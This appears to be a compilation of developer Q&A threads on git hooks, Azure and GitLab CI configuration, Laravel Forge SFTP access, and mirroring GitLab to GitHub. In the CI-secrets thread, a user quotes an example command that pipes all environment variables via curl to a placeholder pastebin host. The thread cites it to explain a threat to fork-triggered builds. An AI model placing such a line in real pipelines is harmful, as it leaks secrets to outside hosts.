I had an experience with slow sqlalchemy subquery using syntax Query.select_from(). Based on this experience, I want to get warning everytime certain syntax is used in our codebase. For example, when programmers add this code bellow, I want to get warnings.
q = session.query(Address).select_from(User).\
join(User.addresses).\
filter(User.name == 'ed')
Is there any linter or tools that can do this?
Ideally, you would set a pre-receive hook on the remote Git repo hosting server, like this one, in order to read the pushed files and grep for "query.*\.select_from": if detected, that hook would reject the push.
If you don't have access to the remote server (for instance GitHub), you would need to set a webhook instead.
The alternative is to deploy a pre-push hook to all clients, and do the check there, but that could be bypassed, or could be not deployed to everybody.
A server side hook / webhook is safer.
Related
I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we could not limit the PR doesn't change at least some critical files.
As workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually building these contributions, which give you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.
For one of our repositories we set "Custom CI configuration path" inside GitLab to a remote gitlab-ci.yml. We want to do this to prevent Developers to change the gitlab-ci.yml file (as protected files are available in EE Premium and up). But except this purpose, the Custom CI configuration path feature should work anyway for Merge Requests.
Being in repo
group1/repo1
we set
.gitlab-ci.yml#group1/repo1-ci
repo1-ci repository exists and ci works correctly when we push to configured branches etc.
For Merge Request functionality GitLab tells us:
Detached merge request pipeline #123 failed for ...
Project group1/repo1-ci not found or access denied!
We added the developers to repo1-ci repo as developers, to be able to read the files. It does not help. Anyway the expectation is, that it is not run with user permissions, so it should simply find the gitlab-ci.yml file.
Any ideas on this?
So our expectations were right an it seems that we have to add one important thing into our considerations:
If a user interacts in the GitLab UI with the Merge Request features and you are using "Custom CI configuration path" for your gitlab-ci.yml file, please ensure
this user needs at least read permissions to that remote file, even if you moved it to another repo on purpose (e.g. use enhanced file protection in PREMIUM/ULTIMATE or push/merge protect the branches for the Developer role)
the user got this permission change applied in a running session
The last part failed for our users, as it worked one day later. Seems that they just continued working from their open merge request page and GitLab checks the accessibility out of this session (using a cookie, token or something which was not updated with the the access to the remote repo/file)
It works!
I'm trying to push a Laravel installation from development to a live-environment on a Laravel Forge-server. When pushing, I'm getting an error, that I'm not getting on my local environment.
I can't figure out, how I connect directly to the provisioned server (through FTP or SFTP), to change single files manually (to debug).
Which means that in order to try something, then I need to make a new commit and an entirely new deployment, for every thing I want to test. Quite tedious and it clutters my git history!
... I can't even do a commit --amend, since that gives me the error:
fatal: refusing to merge unrelated histories
Attempt 1) I can't find anything about it in the Forge knowledge base.
Attempt 2) I've found several articles talking about a good guide, but that guide gives an error 404:
It's this one: https://freek.dev/2016/03/let-your-clients-use-sftp-on-a-forge-provisioned-server/
Am I missing something obvious? Or is the commit-n-push really the way to go? Is this normal for automated deployment systems?
For others who find this question, then Forge-support got back to me really quickly and linked to this blogpost, explaining how to get sftp-access to a Forge-provisioned server
What I did wrong, was that I didn't use the username: forge (I was using my email).
Say I've got an upstream repo (origin) that was added with
git remote add origin file:////upstream.host/repo.git
The repo.git is acually a windows shared folder where I and my dev colleagues have r/w access assigned.
Now, I want to set up a post-receive hook on upstream.host that notifies Trac about freshly pushed revisions for automatic ticket updating. Basically, this is done by calling an executable on upstream.host that does some work in the database there.
However, I notified that the hook for some reason doesn't work.
So I've set up the hook to print everything she's doing to D:/temp/post-receive.log and issued a git push in order to trigger the hook.
When I looked into D:/temp on upstream.host, there was no logfile created.
Then, another question of me came into mind: https://superuser.com/questions/974337/when-i-run-a-git-hook-in-a-repo-on-a-network-share-which-binaries-are-used.
When actually the binaries of my machine are used for executing the hook, maybe also the paths of my machine are used. I looked into D:/temp and voilá, here we have the post-receive.log.
I traced the pwd to the logfile and it is not D:/repos/repo.git (what I expected) but actually is //upstream.host/repo.git. Obviously the whole hook is executed in the context of the pusher's machine and not in the context of the repo machine (upstream.host).
This is no problem for me since I have admin access to the remote machine and could use administrative shares in order to get my hook going (i.e. \\upstream.host\D$\repos\repo.git etc). But this is an issue for my colleagues since they are plain users and no roots.
How do I set up my post-receive hook properly so that it works as expected?
How do I force my hook to be entirely run on the remote machine without using anything from my machine?
Do I really have to implement a real server hosting my repo? Or are there other ways that don't need a server?
a post-receive hook is run after receiving data on the machine that is hosting the repository.
now the machine that is "hosting the repository" is not the file-server where the actual packed-refs and other git database files are stored. (this file-server could be anything from a redundant cloud-based storage appliance to any old NAS-enabled "network disk").
Instead it is the machine that runs the "git frontend" (that is, the git commands that actually interact with the database).
Now you are using a "network share" to host your (remote) git repository. For your computer (the client), this is just another disk device (like your floppy) and the git on your client will happily store database-files there, and run any hooks. But this is your computer, since it is being told to run the remote locally - simply because the file:// protocol does mean "local".
Btw, the fact that your remote is named upstream.host is meaningless: this name is only there for you to keep track of multiple remotes, but it could be called thursday.next instead.
So there is no way to run any script on the file-server that happens to store some files names pack-refs and similar.
If you want to have a git server to run hooks for you, you must have a git server first. Even worse: if you want a git server on machineX to run scripts on machineX, you must install a git server on machineX first.
The good news: there is no need to "implement a real server". Just install a pre-existing one. You will find docuementation about that in the Git Book, but for starters it's basically enough to have git (for interaction with the database) and sshd (for secure communication via the network; and for calling git when appropriate) installed.
Finally: i'm actually quite glad that you need to have software (e.g. a server) running on the remote end to execute code there. Just imagine what it would mean if copying some html files to your USB disk would suddenly spawn a web server out of thin air. Not to think of w32-virusses breeding happily on my linux NAS...
My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a Gitlab server which was installed by our hosting provider
The Gitlab server has many projects.
For some of these projects, I want that Gitlab automatically pushes to a remote repository (in this case Github) every time there is a push from a local client to Gitlab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
Configure the local client with two remotes, and push simultaneous to Gitlab and Github. I want to avoid this because developers.
Add a git post-receive hook in the repository on the Gitlab server. This would be most flexible (I have sufficient Linux experience to write shell scripts as git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider will need to give me shell access.
I use webhooks in Gitlab. I am unfamiliar with what the very basics of webhooks are, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from Gitlab that I found and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
class PewPewPew < Sinatra::Base
post '/pew' do
push = JSON.parse(request.body.read)
puts "I got some JSON: #{push.inspect}"
end
end
Next: find out how to tell the gitlab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to Github. I can even do some "magic" (running tests, building jars, deploying to Artifactory,...) before I push to GitHub. In fact it would be great if Jenkins were able to push to a remote repository after a succesful build, then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for Gitlab, either native or via a plugin. But I don't know. Yet.
EDIT
I solved it in Jenkins.
You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
would work of course.
is possible but dangerous because GitLab shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Web hooks are not suitable directly: they make an HTTP request with fixed format on certain events, in your case push, not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (already implements hook management) would be strictly better solutions.
services are a the best option if someone implements it: live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI or othe CIs like Jenkins are the best option currently available. They are essentially already implemented server for the webhooks, which automatically clone for you: all you have to do then is to push from them.
The keywords you want to Google for are "gitlab mirror github". That has led me to: Gitlab repository mirroring for instance. There seems to be no perfect, easy solution today.
Also this has already been proposed at the feature request forum at: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one git remote in an Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a #daily schedule from the BuildResultTrigger plugin.